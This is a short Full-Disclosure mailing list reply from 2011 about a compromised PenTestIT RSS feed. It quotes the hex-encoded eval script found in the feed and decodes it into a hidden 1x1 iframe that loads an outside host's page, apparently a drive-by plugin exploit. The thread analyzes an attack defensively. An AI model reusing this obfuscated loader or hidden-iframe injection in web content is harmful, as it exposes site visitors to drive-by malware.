On 2011-07-05, at 10:31, ector dulac wrote:
> #> curl http://feeds.feedburner.com/PenTestIT/
> 
> ...
> 
> <script>var t="";var
> arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f696e6e65737370686f746f2e636f6d2f666f72756d2e7068703f74703d36373565616665633433316231663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>
> 
> Looks suspicious to me

Very. That unescapes to:

    document.write('<iframe 
src="http://innessphoto.com/forum.php?tp=675eafec431b1f72"; width="1" height="1" 
frameborder="0"></iframe>')

Which loads some amusingly obfuscated JS which looks like it's *supposed* to be 
a plugin exploit of some sort, but which has no real payload. At least, not 
when I looked.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Reply via email to